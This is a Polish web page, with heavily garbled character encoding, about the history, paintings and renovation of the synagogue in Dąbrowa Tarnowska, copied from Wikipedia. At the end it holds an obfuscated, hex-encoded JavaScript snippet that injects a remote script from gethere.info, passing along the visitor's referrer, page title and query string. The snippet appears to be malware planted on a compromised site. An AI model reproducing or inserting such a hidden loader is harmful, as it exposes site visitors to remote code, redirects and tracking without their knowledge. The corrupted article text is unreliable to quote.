PiA�kna synagoga w DA�browie Tarnowskiej


Synagoga w DA�browie Tarnowskiej jest najwiA�kszA� zachowanA� synagogA� w wojewA?dztwie maA�opolskim. SzczegA?lnA� uwagA� zwracajA� zachowane liczne fragmenty malowideA�, a takA?e fakt, iA? znaki zodiaku wystA�pujA� tak na fasadzie jak i w jej wnA�trzu (PannA� symbolizuje dA�oA� kobieca podtrzymujA�ca kosz z kwiatami). Remont synagogi zostaA� dofinansowany ze A�rodkA?w unijnych. Budynek popadaA� w ruinA�, a koszt jej remontu okazaA� siA� ogromny, wiA�c Warszawska Gmina A�ydowska chA�tnie ten budynek oddaA�a i sA�uA?y teraz OA�rodkowi Spotkania Kultur (takA?e mini muzeum) w odrA?A?nieniu do Klimontowa, gdzie wA�adze miasteczka wczeA�niej wyremontowaA�y (zabezpieczyA�y) synagogA�, a teraz Warszawska Gmina A�ydowska nie chce jej przekazaA� – wiA�c obiekt popada w ruinA�.

synagoga sufit

synagoga  A�rodek

 

synagoga wn A�trze

 

Synagoga zostaA�a zbudowana w drugiej poA�owie XIX wieku wedA�ug projektu A?ydowskiego architekta i inA?yniera Abrahama Goldsteina. GA�A?wnym fundatorem byA� Ajzyk Stern. DokA�adna data zakoA�czenia budowy to najprawdopodobniej 1 kwietnia 1863 roku. Prace budowlane i wykoA�czeniowe przy niej trwaA�y w latach 1855-1860.A�A�NiepeA�nych informacji dostarcza korespondencja pomiA�dzy fundatorem a miejscowym stolarzem Joselem SA?ssem z 1863 roku, z ktA?rej wynika, A?e ten ostatni w tym roku wykonaA� dla synagogi 14 okien i 2 drzwi.

We wnA�trzu synagogi zachowaA� siA� bogaty wystrA?j malarski, gdzie polichromie przetrwaA�y w gA�A?wnej sali modlitewnej, a ponadto w sieni przejA�ciowej i dwu salkach doA� przylegajA�cych, na dwA?ch kondygnacjach babiA�ca, a takA?e na elewacjach wschodniej i zachodniej.A�A�WedA�ug tradycji, autorami malowideA� byli wA�oscy artyA�ci, bracia Fenichel z Mielca lub malarze z Buska.A�A�Prace prowadzone wewnA�trz budynku wykazaA�y, A?e pod obecnymi polichromiami jest druga warstwa malarska,A�A�nawiA�zujA�ca do tradycji barokowych.

Jeszcze na poczA�tku XX wieku przy budynku staA�a maA�a, drewniana synagoga, w ktA?rej modlili siA� wyA�A�cznie A�ydzi ortodoksyjni. Na poczA�tku tego stulecia zbudowano po stronie wschodniej mykwA�, ktA?rA� rozebrano po zakoA�czeniu II wojny A�wiatowej. Podczas I wojny A�wiatowej synagoga ulegA�a zniszczeniu. Zaraz po wojnie gruntownie zostaA�a odnowiona, dziA�ki funduszom jednego z mieszkaA�cA?w DA�browy a�� Golda. W latach 1936-1937 przeszA�a generalny remont pod nadzorem Doroty Mertz z Tarnowa, podczas ktA?rego dobudowano do fasady w miejsce drewnianej konstrukcji, wielki, trA?jkondygnacyjny kruA?ganek.

stan 2006Synagoga w roku 2006.

nowa synagogaSynagoga dziA�.

A?rA?dA�o:A�https://pl.wikipedia.org/wiki/Synagoga_w_D%C4%85browie_Tarnowskiej


 

 

 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}